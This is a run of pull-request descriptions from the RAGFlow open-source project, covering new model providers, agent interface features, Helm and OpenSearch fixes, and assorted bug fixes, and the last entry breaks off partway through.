- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add a series of qwen3 latest SOTA models:
qwen3-coder-480b-a35b-instruct, qwen3-30b-a3b-instruct-2507,
qwen3-30b-a3b-thinking-2507, qwen3-235b-a22b-instruct-2507,
qwen3-235b-a22b-thinking-2507
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Remove the exception comment field from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix kimi-latest is not authorized.
Add kimi-thinking-preview.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
```bash
Traceback (most recent call last):
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 635, in update_progress
info["progress_msg"] = "%d tasks are ahead in the queue..."%get_queue_length(priority)
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 686, in get_queue_length
return int(group_info.get("lag", 0))
TypeError: int() argument must be a string, a bytes-like object or a real number, not 'NoneType'
```
This issue can happen very rare. When a `stream` is first created, the
`lag` value may be nil, which can cause this issue. However, once any
message is synced, the `lag` will become `0` afterwards.
```bash
> XINFO GROUPS rag_flow_svr_queue
1) 1) "name"
2) "rag_flow_svr_task_broker"
3) "consumers"
4) (integer) 0
5) "pending"
6) (integer) 0
7) "last-delivered-id"
8) "1753952489937-0"
9) "entries-read"
10) (nil)
11) "lag"
12) (nil)
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete the operator node and hide the corresponding sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display operator icons on the agent form #3221
Fix: Fixed the issue where the form corresponding to the tool operator
icon could not appear after clicking it #3211
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Improve Agent templates functionality and fix some UI style issues
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the tool operator icon #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
add Kimi-K2-Instruct from Tongyi-Qianwen API
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Automatically save agent canvas content
Feat: Replace the link of the old version of the agent module #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add Generator return type annotation for tts method
- Import typing.Generator for type hints
### Type of change
- [x] Refactoring
### What problem does this PR solve?
This code allows user chat to auto-scroll down when entered, but if user
scrolls up away from the generative feedback, autoscroll is disabled.
Close#9062
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Make the agent dialog window exposed to the outside world fill in
the begin form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9082#6365
<u> **WARNING: it's not compatible with the older version of `Agent`
module, which means that `Agent` from older versions can not work
anymore.**</u>
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Handling abnormal anchor points of agent operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add log-detail page,Improve the style of chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate operator names and allow mailboxes to reference operator
names #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Replace the placeholder test image in base64_image.py with a new sample
image data string.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add wencai operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
doc_ids is a list , should use request.args.getlist("doc_ids")
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add invoke and github operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix error 429 api rate limit when building knowledge graph for all chat
model and Mistral embedding model.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix incomplete curl command in section 5 'Tool calling', add missing
closing braces and parentheses to complete the JSON payload
This resolves the incomplete bash script that was missing proper JSON
structure closure.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Add agent-log-list page And RAPTOR:Save directly after enabling,
incomplete form submission #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Supports jsonl or ldjson format. Feature request from
[discussion](https://github.com/orgs/infiniflow/discussions/8774).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enable MCP streamable-http model via docker compose
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Arxiv GoogleScholar operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Email and DuckDuckGo and Wikipedia Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation for MCP streamable-http transport.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: Add Yahoo Finance Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Google operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the uploaded agent message file #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The operator is displayed only when the number of conditions is
greater than 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Click the edit tool button of the agent form to open the
corresponding form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent log-sheet in cavas and log-sheet in share's page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the condition of deleting the classification
operator cannot be connected anymore #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Mac OS build fails on M4. Docker compose requires platform to be
specified to build correctly
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Filter the agent form's large model list by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Keep the workflow page link unchanged #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update BaseModel to use model_config instead of Config class
- Replace StrEnum with Literal types for method fields
- Convert Field declarations to Annotated style
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add parsing animations to the agent log and optimize some page styles
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small non-blocking main workflow bug about chunk update When
OpenSearch is the doc engine.
When you wanna enable/disable a chunk in the web-page “Knowledge Base /
Dataset / Chunk”, the bug ocurred.
<img width="2388" height="662" alt="image"
src="https://github.com/user-attachments/assets/575987a0-c929-4589-bfa0-ba54e137cfd9"
/>
The reaseon why it ocurred is that some api params between OpenSearch
and ES differs. It functioned well no matter enable/disable/rewrite the
chunk after I fixed. I also checked the result when using the chat
web-page.
<img width="2394" height="660" alt="image"
src="https://github.com/user-attachments/assets/8b899dc6-d769-4e80-8dd8-ad0fbbca5f78"
/>
I will still focus on vector-database espeically OpenSearch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 张雨豪 <zhangyh80@chinatelecom.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Downstream operators can get the variables defined by the user
input operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allows users to delete a condition of a conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix issue with `keep_alive=-1` for ollama chat model by allowing a user
to set an additional configuration option. It is no-breaking change
because it still uses a previous default value such as: `keep_alive=-1`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [X] Performance Improvement
- [X] Other (please describe):
- Additional configuration option has been added to control behavior of
RAGFlow while working with ollama LLM
### What problem does this PR solve?
Feat: Modify the background color of the agent canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Obfuscates additional secrets values on ragflow_server startup to
prevent leakage:
* `secret` (azure)
* `client_secret` (oauth)
* `http_secret_key` (authentication)
* `sas_token` (azure)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Gifford R Nowland <gifford.r.nowland@aero.org>
### What problem does this PR solve?
Previous version created labels which were dependent on the specific
Helm chart version such as:
```
volumeClaimTemplates:
- metadata:
name: redis-data
labels:
helm.sh/chart: ragflow-0.2.3-dev.0.opensearch-test.4
app.kubernetes.io/name: ragflow
app.kubernetes.io/instance: test-1
app.kubernetes.io/version: "9a04408"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: redis
```
which causes `helm upgrade` commands to fail with
```
Upgrade "test-1" failed: cannot patch "test-1-ragflow-redis" with
kind StatefulSet: StatefulSet.apps "test-1-ragflow-redis" is
invalid: spec: Forbidden: updates to statefulset spec for fields
other than 'replicas', 'ordinals', 'template', 'updateStrategy',
'persistentVolumeClaimRetentionPolicy' and 'minReadySeconds' are
forbidden
```
because the labels changed on upgrade.
This fix uses a reduced set of labels to prevent upgrade failures.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix Kubernetes liveness probe on the OpenSearch container. The previous
HTTP probe received an 401 response from the OpenSearch API which
treated as a failure and caused the container to be restarted every 20
minutes.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Replace Avatar with RAGFlowAvatar component for knowledge base and
agent, optimize Agent template page, and modify bugs in knowledge base
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Bump to infinity v0.6.0-dev4.
WARNNING: infinity v0.6.0-dev4 has very different meta data format with
older versions. You have to destroy infinity data volume are restart
infinity container if there's existing data.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add model provider DeepInfra. This model list comes from our community.
NOTE: most endpoints haven't been tested, but they should work as OpenAI
does.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Share agent dialog box externally #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
OpenAI-compatible-API supports references.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the error prompt box on the Agent page would
be covered #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Extended embedding model timeout from 3 to 10 seconds in api_utils.py
- Added more time for large file batches and concurrent parsing
operations to prevent test flakiness
- Import from #8940
- https://github.com/infiniflow/ragflow/actions/runs/16422052652
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
PR #8665 updated chrome and chromedriver sources, removing the appended
version number. This PR resolves filename inconsistencies that would
cause `Dockerfile.deps` to fail to build when ommiting `--china-mirrors`
when running `uv run download_deps.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Switch to Kubernetes StatefulSet resources for MySQL, Minio and vector
DB since these are stateful application components. This makes
operations such as helm upgrade smoother since the default container
update strategy becomes a sequential rolling update of each pod.
Also fixes a bug in the name template for the Minio stateful set
resource to align it with the naming convention used for other
components.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds configurations for gemini-2.5-flash and Gemini 2.5-pro models,
including tags, maximum token limits, and model types.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Use `quote_plus` to escape password in opendal's mysql url to support
special characters like `#`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update `get_parser_config` to merge provided configs with defaults
- Add GraphRAG configuration defaults for all chunk methods
- Make raptor and graphrag fields non-nullable in ParserConfig schema
- Update related test cases to reflect config changes
- Ensure backward compatibility while adding new GraphRAG support
- #8396
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve usability of Node.js/JavaScript code executor.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Correct cancel logic error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Feat: Adjust the page header to breadcrumbs #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add the option to use the knowledge graph to the retrieval form
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the key parameter duplication check of the
begin operator was incorrect #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of clicking to run the agent causing an error #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Generate avatar; Add knowledge graph; Modify the style of the
multi-select component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue that variables defined in the begin operator cannot
be referenced in the switch operator. #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display agent version in pages #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent history versions #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of the agent canvas connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Adds OpenSearch support to the RAGFlow Helm chart based on
https://github.com/infiniflow/ragflow/pull/7140 and the existing
Elasticsearch support in the Helm chart.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
…be seen when selecting the next operator #3221
### What problem does this PR solve?
Fix: Fixed the issue that the content of the Dropdown section cannot be
seen when selecting the next operator #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the EmbedDialog style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Show agent embed dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add TavilyExtract operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the knowledge graph could not be displayed
#8890
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the problem that the custom footer of modal component is not
effective, specify the react and react-dom versions, and add the
input-number component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix opensearch OSConnection init.
```
docStoreConn = rag.utils.opensearch_conn.OSConnection()
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
when``` if 'signature_version' in self.s3_config:``` and ```if
'addressing_style' in self.s3_config:``` both true.
the config init is error, will be overwrite by last one.
this pr is for fix that case.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Feat: Display the thinking process according to the start_to_think flag
of the message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: modify the connection ports of minio and redis in
service_conf.yaml.template
### What problem does this PR solve?
If you modify the external ports of minio and redis in the .env file, it
will also affect the connection ports inside the container in the
service_conf.yaml.template file, which is unreasonable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Correct the logging message from "OpenAI cat_with_tools" to "OpenAI
chat_with_tools" in the `_exceptions` method of the `Base` class to
accurately reflect the method name and improve error traceability.
### Type of change
- [x] Typo
### What problem does this PR solve?
Add Kimi model series support.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed graphknowledge Tree structure not found for treeKey.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR enhances the application's capabilities by adding support for
four new Voyage embedding models (voyage-3-large, voyage-3.5,
voyage-3.5-lite, and voyage-code-3) to the `llm_factories.json`
configuration file. These models expand the available options for text
embedding tasks, enabling improved processing of text data with a
maximum token limit of 32,000. This addition addresses the need for more
diverse and specialized embedding models to support various use cases
without altering existing functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent tool CrawlerForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add CrawlerForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display file references for agent dialogues #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed invalid save() arguments for slide thumbnails.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add authorization token field to the MCP form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix context loss caused by separating markdown tables from original
text. #6871, #8804.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This change adds 'Vietnamese' to the list of supported languages in two
components related to cross-language functionality. The addition expands
language support by including Vietnamese as a selectable option
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes no chunks parsed out for Law. #5113
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust agent mcp style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize MCP data to agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the mcp list on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter MCP server list by text. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### AgentCreateBUGFix
Because useFetchFlowTemplates is called both in the hooks and the
AgentTemplateModal, and the ID of the empty template is generated via
uuid, there may be cases where the IDs do not match.
Report a BUG as follows:
Prompt: 101
Required argument is missing: dsl;
<img width="472" height="121" alt="52d79682-4e50-4863-8486-f1e154003043"
src="https://github.com/user-attachments/assets/c5d217c9-b6cc-4ef2-866b-694c8b9ab3ae"
/>
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 海贼宅 <stu_xyx@163.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Add document viewers for text and markdown files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Import and export MCP Server #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix dataset-page's bugs,Input component supports icon, added Radio
component, and removed antd from chunk-result-bar page [#3221
](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change document status in bulk.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add xAI provider (experimental feature, requires user feedback).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the agent tool name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes a function name typo for the `/list` route in
`api/apps/conversation_app.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Avoid the form sheet covering the chat sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The rm function in chunk_app.py now takes the index name differently
than other functions, so there will be situations where users can create
and update a chunk but not delete it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Based on https://github.com/infiniflow/ragflow/issues/8740
1. A better handle for 'NoneType' object is not subscriptable
2. Add some logs to get the internal message
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Changed the default value of `chunk_token_num` from 128 to 512 in both
HTTP and Python API reference documentation to reflect the updated
configuration.
#8753
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Updated the default `chunk_token_num` value in `api_utils.py` and
`validation_utils.py` to 512 to accommodate larger text chunks. Adjusted
corresponding test cases in HTTP and SDK API tests to reflect this
change.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display MCP multiple selection bar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Validate dialog name in `dialog_app.py` to ensure it is a non-empty
string and does not exceed 255 bytes in UTF-8 encoding.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change the data in the dataset page to be obtained using the interface,
and change the import to obtain all data every 15 seconds to obtain the
data of the current page every 5 seconds when parsing the existing file.
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This commit introduces a comprehensive test suite for the dialog app,
including tests for creating, updating, retrieving, listing, and
deleting dialogs. Additionally, the common.py file has been updated to
include necessary API endpoints and helper functions for dialog
operations.
### Type of change
- [x] Add test cases
### What problem does this PR solve?
1. Remove the useless pop logic due to already been checked at the if
logic
2. merge log logic
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Added support for preview of txt, md, excel, csv, ppt, image, doc and
other files [#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Get the running log of each message through the trace interface
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
'handleOk' was used before it was
defined.eslint@typescript-eslint/no-use-before-define
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Suppress docker-compose warning like:
```bash
The "HF_ENDPOINT" variable is not set. Defaulting to a blank string.
The "MACOS" variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_IMAGE variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_PORT variable is not set. Defaulting to a blank string.
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Use use-chunk-request.ts to replace chunk-hooks.ts; implement chunk
selectAll, enable, disable and other functions
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Ensure consistent Minio deployment by pinning the image to a specific
release version (RELEASE.2025-06-13T11-33-47Z) for stability and
reproducibility.
- #8672
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Support uploading files when running agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: retry embedding with Qwen family models when limits temporarily
reached.
APIs of Qwen family models are limited by calling rates. When reached,
the "output" attribute of the "resp" will be None, and in turn cause
TypeError when trying to retrieve "embeddings". Since these limits are
almost temporary, I have added a simple retry mechanism to avoid it.
Besides, if retry_max reached, the error can be early raised, instead of
hidden behind "TypeError".
### What problem does this PR solve?
Sometimes Qwen blocks calling due to rate limits, but it will cause the
whole parsing procedure stops when creating knowledge base. In this
situation, resp["output"] will be None, and resp["output"]["embeddings"]
will cause TypeError. Since the limits are temporary, I apply a simple
retry mechanism to solve it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix the case where pages variable might be None
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1.The old base image lost the curl command, and an updated image was
used to fix this issue (the service has been tested in the new version)
2.Add Health Check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small typo in count of used fragments.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Wrong Citation Display #8594#8474
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Create a new message component to replace the antd message
component, create a new Spin component to replace the antd Spin
component, optimize the original paging component style, and optimize
the chunk result page[
#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Optimized the style of the dataset configuration page and added the
logic of cancelling submission
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolves ambiguity and potential MITM attacks by using official channel
for chromedriver-linux in download_deps.py
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Fixed the issue where the debug form Switch component had no
default value #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of retrieval operator text overlapping #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Edit the output data of the code operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the iteration operator toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Optimize the style and logic of the profile [#3221
](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Combine the output logs of the same operator together #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Issue #8602
`parser_config.task_page_size` can be defaults to `None` when dataset is
created by API. This was not handled by the `task_executor.py` code thus
`page_size` could sometimes be `None` which will cause issue in line
351.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The following error occurred during local testing, which should be fixed
by configuring 'exist_ok=True'.
```log
set_progress(7461edc2535c11f0a2aa0242c0a82009), progress: -1, progress_msg: 21:41:41 Page(1~100000001): [ERROR][Errno 17] File exists: '/ragflow/tmp'
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Update Chrome download URL in use_china_mirrors configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: lqh <liqunhuan@foreveross.com>
### What problem does this PR solve?
Feat: Convert the arguments parameter of the code operator to a
dictionary #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the config option name of the opendal table name and setting of
'max_allowed_packet'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: He Wang <wanghechn@qq.com>
### What problem does this PR solve?
This PR introduces Google Cloud Vision API integration to enhance image
understanding capabilities in the application. It addresses the need for
advanced image description and chat functionalities by implementing a
new `GoogleCV` class to handle API interactions and updating relevant
configurations. This enables users to leverage Google Cloud Vision for
image-to-text tasks, improving the application's ability to process and
interpret visual data.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Construct the to field of the classification operator when saving
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add comprehensive test suite for chunk operations including:
- Test files for create, list, retrieve, update, and delete chunks
- Authorization tests
- Batch operations tests
- Update test configurations and common utilities
- Validate `important_kwd` and `question_kwd` fields are lists in
chunk_app.py
- Reorganize imports and clean up duplicate code
### Type of change
- [x] Add test cases
### What problem does this PR solve?
docx parse error.

### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Some docx parse with naive cause error. `block.style.name` in Function
`__get_nearest_title` will be None in some case.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenxuan.zhang <wenxuan.zhang@chinacreator.com>
### What problem does this PR solve?
Fix: Fixed the issue that the global variables of the code operator
cannot be selected #3221
### Type of change
